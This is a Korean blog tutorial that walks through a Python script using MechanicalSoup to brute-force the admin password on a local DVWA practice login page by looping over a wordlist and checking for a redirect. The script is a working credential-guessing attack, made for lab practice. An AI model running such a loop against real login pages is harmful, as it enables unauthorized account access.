close
프로필 배경
프로필 로고

최류현의 컴퓨터 정보공간

  • 이메일 : yousin_ms@naver.com
  • 텔레그램
    • 리눅스 & 해킹 & 보안/DVWA · 2022. 7. 2. fullscreen 넓게보기

    DVWA 로그인페이지 브루트포스 공격 파이썬 실습

    예전에 DVWA 설치 및 브루트포스 어택을위한 사전 패스워드 생성방법에대한 글을 작성한적이 있는데요

    본격적인 강의에 앞서 이전 내용이 기억나지 않거나 궁금하신분들은 아래 게시물들을 참고해주세요

     

     

    칼리리눅스 최신버전 DVWA 설치하기

    윈도우10 모의해킹환경 DVWA 설치하기 취약한 웹 애플리케이션 DVWA란? 웹 취약점인 SQL 인젝션이나 XXS공격 등을 연습해보기 위해 설계된 웹취약점 에플리케이션 DVWA를 설치해봅시다 DVWA는 Damn Vulner

    newstroyblog.tistory.com

     

     

    윈도우10 모의해킹환경 DVWA 설치하기

    취약한 웹 애플리케이션 DVWA란? 웹 취약점인 SQL 인젝션이나 XXS공격 등을 연습해보기 위해 설계된 웹취약점 에플리케이션 DVWA를 설치해봅시다 DVWA는 Damn Vulnerable Web App의 약자입니다 DVWA는 취약하

    newstroyblog.tistory.com

     

     

    파이썬 브루트포스 공격(BruteForce Attack) 사전파일 만들기

    목차 1.무차별대입공격(BruteForceAttack) 2.for문으로 반복하여 패스워드 리스트 생성 3.itertools를 사용하여 패스워드 리스트 생성하기 4.조금 더 깔끔하게 출력하기 5.GITHUB 무차별대입공격(BruteForceAttac

    newstroyblog.tistory.com

     

     

    우선 DVWA의 로그인 페이지를 확인해봅시다

     

     

    http://localhost/dvwa/login.php

    위의 url형식으로 dvwa아래에 login.php파일을 url에 입력하시면 로그인페이지가 나오게됩니다

     

    기본적으로

    ID: admin

    Password: password 를 입력하면 로그인이 가능한데 이를 모른다고 가정하였을때 파이썬을 통해 브루트포스 공격을 시도해보겠습니다

     

    패키지 설치 명령어

    코드 작성전 필요한 MechanicalSoup 라는 패키지를 다운받아줍시다

    pip install MechanicalSoup

or

pip install git https://github.com/MechanicalSoup/MechanicalSoup

or

git clone https://github.com/MechanicalSoup/MechanicalSoup
cd MechanicalSoup
python setup.py install

     

     

    코드 작성

    1
    2
    3
    with open('C:\\Users\\root\\Downloads\\pw.txt''r'as f:
        pwline = f.readlines()
     
     
    		 cs

    먼저 이전에 만든 패스워드 사전파일을 가져와봅시다

    open 함수를 사용하여 지정된 경로의 파일을 read의 약자인 r옵션으로 읽어들여옵니다

    그리고 읽어온 내용들을 pwline 변수에 담아줄건데 여기서 readlines()는 한줄씩 리스트 형태로 문자열을 가져옵니다

     

     

    위와 같이 작성후에 print함수로 pwline을 출력해보면 아래와같은 형태로 패스워드 리스트들이 출력됩니다

    ['1234\n', '5632\n', 'age\n', 'hjte\n', '245\n', 'hwer5433\n', 'wrh453\n', 'wr523\n', 'zx\n', 'ga\n', 'a\n', 'b\n', 'c\n', 'd\n', 'admin\n', 'e\n', 'f\n', 'g\n', 'hi\n', 'jk\n', 'pgl\n', 'goesg\n', 'aekjalg\n', 'hello\n', 'world\n', 'apple\n', 'samsung\n', 'windows\n', 'password\n', '456\n', 'workshop']

     

     

    1
    2
    3
    4
    words =[]
    for word in pwline:
        words.append(word.strip().replace('\n',''))
        print(word)
     
    		 cs

    그리고 불러온 패스워드 리스트들의 불필요한 문자를 제거하여 words변수에 리스트형태로 넣어줍니다

     

    word.strip() = 문자의 공백제거

    .replace('\n','') = 개행문자 \n을 '' 문자로 변경

    words.append = words리스트에 반복하여 문자열을 추가

     

     

    1234
5632
...

456
workshop

     

    그리고 print로 word변수를 출력해보면 깔끔하게 출력되는걸 확인할수 있습니다

     

     

     

    1
    2
    3
    import mechanicalsoup
     
    browser = mechanicalsoup.StatefulBrowser()
    		 cs

    이제 설치한 mechaincalsoup 패키지를 불러온후에  웹 문서에 삽입된 각 요소를 객체로 인식하고 조작할수 있도록 브라우저를 객체화해줍니다

     

    1
    browser.open("http://localhost/dvwa/login.php")
    		 cs

    이제 대상이될 웹페이지를 열어줍니다

     

    1
    2
    print(browser.open("http://localhost/dvwa/login.php"))
    print(browser.get_url())
    		 cs

    정상적으로 작동하는지 웹페이지의 응답을 확인하기위해서 print문으로 출력한후에 borwser.get_url 메소드(메소드: 클래스내에 있는 특정함수) 를 통해 현재 사용중인 url을 가져와보겠습니다

     

     

    실행결과를 살펴보면 아래와같이 출력됩니다

    <Response [200]>
http://localhost/dvwa/login.php

    정상적으로 요청을 수행할 경우에 HTTP의 응답상태 OK상태인 200이 표시되며 현재 사용중인 url이 출력되는걸 확인할수 있습니다

    정상적으로 작동하는걸 확인했으면 위 두줄은 주석처리하거나 삭제해줍니다

     

     

    다음은 select_form() 메소드에대해 설명할건데 그전에 우선

    dvwa 로그인페이지에서 개발자도구를 사용하여 로그인페이지 form 태그를 확인해봅시다

     

     

    로그인 텍스트박스에서 우클릭후 검사를 눌러도되고 F12를 눌러 개발자도구로 아이디와 비밀번호 입력 필드를 코드로 확인해보면 input 태그로 각각 username과 password라는 이름(name)으로 정의 되어있는걸 확인할수 있습니다

     

    그리고 input태그들은 form에 감싸져있는걸 확인할수 있습니다

     

     

    select_form() 메소드는 css선택자이며 현재 페이지의 Form양식 요소를 가져오는데 사용됩니다

    만약에 현재 웹페이지에 Form이 하나일경우엔 함수내의 매개변수를 생략하셔도 됩니다

     

     

    browser.select_form('form[action="/post"]')

    기본적인 사용방법은 이와같은데 위의 사진을 보면 dvwa의 로그인페이지에는 <form action="login.php">형식으로 이루어져 있습니다

     

    1
    2
    3
    browser.select_form('form[action="login.php"]')
    browser["username"= "admin"
    browser["password"= i
    		 cs

    그래서 1번째 줄에 "/post"부분에는 "login.php"를 입력하여 위와같이 작성해줍니다

    2번째와 3번째 줄은 form내의 아까 username와 password로 이름이 정의된 필드두개에 정상적인 로그인 데이터 값을 각각 대입해줍니다

     

    username의 경우 admin이라는 문자열을 고정하였고 password는 사전파일에 담긴 내용이 들어갈 i변수로 설정해줍니다

    i변수에는 맨처음 텍스트파일에서 공백과 불필요한 내용을 제거한 words함수의 내용이 for문으로 반복하게 됩니다(for문은 본문하단에 마지막부분에 설명할테니 우선은 따라와주세요)

     

     

    1
    browser.submit_selected()
    		 cs

    이제 아이디와 패스워드까지 대입을 하였다면 브라우저 개체의 양식을 제출하여 정상적으로 로그인을 하는게 목적입니다

    양식을 제출하기 위해서는 browser.submit_selected() 메소드를 사용하면 됩니다

     

     

    로그인 성공여부 확인하기

    만약에 dvwa 로그인 페이지에서 admin와 password를 입력하여 로그인하였을경우에는 http://localhost/dvwa/index.php로 리다이렉션 되는걸 확인하실수 있습니다

     

    그리고 만일 로그인에 실패할경우에는 현재 페이지에 계속 머물게됩니다

     

    아까 웹페이지의 응답을 확인하기 위하여 browser.get_url() 메소드를 사용하였는데 양식을 제출한후에 borwser.get_url()메소드를 사용할경우엔 index.php로 리다이렉션되어 login.php가 아닌 index.php로 url값이 출력됩니다

    즉 index.php로 리다이렉션 됬을경우엔 로그인성공 이외에는 로그인 실패로 분류하면 됩니다

    1
    2
    3
    4
    5
    if browser.get_url() == "http://localhost/dvwa/index.php":
        print("로그인 성공")
        
    else :
        print("로그인 실패")
     
    		 cs

     

     

     

    반복작업을 위한 for문 추가

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    for i in words:
        browser = mechanicalsoup.StatefulBrowser()
     
        browser.open("http://localhost/dvwa/login.php")
     
        browser.select_form('form[action="login.php"]')
        browser["username"= "admin"
     
     
     
        browser["password"= i
     
        browser.submit_selected()
     
        if browser.get_url() == "http://localhost/dvwa/index.php":
            print(f"로그인 성공 : {i}")
            break
        else :
            print(f"로그인 실패 : {i}")
     
     
    		 cs

    그리고 아까 id와 password값을 지정하는 부분에서 password를 i라고 지정하였고 for문은 마지막에 추가한다고 하였는데

    반복적인 작업을위해 지금까지 설명한 코드를 for문으로 돌려줍니다

    위코드는 이전에 설명한 내용인데 for문만 추가하였습니다

     

    password의 값은 words 리스트의 첫번째 값부터 끝의 값까지 반복하여 로그인여부를 확인하게 됩니다

     

    Github - 전체코드

     

    Dvwa-loginpage-brutueforce

    Dvwa-loginpage-brutueforce

    https://github.com

     

     

    참고자료

    https://dojang.io/mod/page/view.php?id=2326 https://www.daleseo.com/python-open/

     

    [파이썬] open() 함수를 이용한 파일 입출력

    Engineering Blog by Dale Seo

    www.daleseo.com

     

    파이썬 코딩 도장: 27.2 문자열 여러 줄을 파일에 쓰기, 읽기

    이번에는 문자열 여러 줄을 파일에 쓰고 읽는 방법을 알아보겠습니다. 27.2.1  반복문으로 문자열 여러 줄을 파일에 쓰기 앞에서 문자열 한 줄을 파일에 썼는데 문자열 여러 줄은 어떻게 쓰면 될

    dojang.io

    https://www.youtube.com/watch?v=HVc9c_f8pBU 

    https://www.youtube.com/watch?v=HKaAqj2CX50 

    https://mechanicalsoup.readthedocs.io/en/stable/tutorial.html

     

    MechanicalSoup tutorial — MechanicalSoup 1.1.0 documentation

    A more complete example: logging-in into GitHub The simplest way to use MechanicalSoup is to use the StatefulBrowser class (this example is available as examples/example.py in MechanicalSoup’s source code): """Example app to login to GitHub using the Sta

    mechanicalsoup.readthedocs.io

     

     

    A Deep Dive Into Web Scraping Using MechanicalSoup

    We are going to create a custom dataset of cats images using MechanicalSoup, further you can use them on your data science project.

    analyticsindiamag.com

    https://www.codeschat.com/article/138.html

     

    mechanicalsoup tutorial

    MechanicalSoup, using pure Python development, the underlying layer based on Beautiful Soup and Requests, to achieve web automation and data crawling mechanicalsoup github 1.Installation and common usage First install the dependency libraries # Installing

    www.codeschat.com

     

    저작자표시 비영리 변경금지
    리눅스 & 해킹 & 보안/DVWA 관련 글
    더 보기
    Blog © 최류현의 컴퓨터 정보공간 Skin Copyright © 쭈미로운 생활 All rights reserved.
    Designed by JJuum
    Top

    티스토리툴바